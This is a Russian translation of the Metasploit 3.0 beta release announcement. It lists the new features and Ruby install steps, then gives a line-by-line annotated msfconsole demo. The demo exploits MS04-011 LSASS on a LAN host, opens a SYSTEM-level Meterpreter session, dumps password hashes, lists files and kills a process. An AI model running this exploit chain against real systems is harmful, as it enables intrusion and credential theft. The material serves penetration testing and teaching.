Мы счастливы объявить, что первый beta 3.0 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.0 1 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.
Некоторые фишки по сравнению с версией 2.6:
- Все модули организованы в каталоге heirarchy
- Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
- Новые особенности Meterpreter значительно помогают с испытанием проникновения
- Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
- Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
- Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
- Поддержка для последних багов браузеров :-)
Этот выпуск может быть скачан с официального web-сайта Metasploit
отсюда
Пользователи Unix, нуждаются в установке openssl и zlib модулей
Руби (Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
Если Вы используете Ubuntu, выполните следующие команды:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от www.ruby-lang.org и собрать его из исходника.
Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)
Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).
Быстрая демонстрация использования msfconsole с meterpreter:
____________
<metasploit>
------------
\, __,
\ (oo) ____
(__)) || - || *
= [msf v3.0-beta-1
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads....................[86 эксплоитов - 90 начинок (полезных грузов)
+ -- --=[ 16 encoders - 4 nops ........................[16 кодеров - 4 только для указанных целей (неуверен в переводе)
= [4 aux
msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит
[*] Started bind handler.. .................................... стартует связанный обработчик
[*] Getting OS information... .................................... Получаем информацию об операционной системе
[*] Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000
[*] Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)
[*] Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)
[*] Sleeping before handling stage... ................................... Бездействие перед обработкой стадии
[*] Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...
[*] Upload completed. .................................................. . Загрузка завершена.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)
[*] The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
meterpreter > use priv .................................................. используем priv
Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
meterpreter > hashdump .................................................. Дампим хэш
Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
Listing: c: .................................................. ........... Листинг С:
============
Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]
meterpreter > ps .................................................. ....... смотрим процессы
Process list
============
PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ] .................................................. ................ надрез
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr
meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
Killing: 2676 .................................................. ........... убивается ;-)
Обратная связь
Старые статьи были перемещены в архив.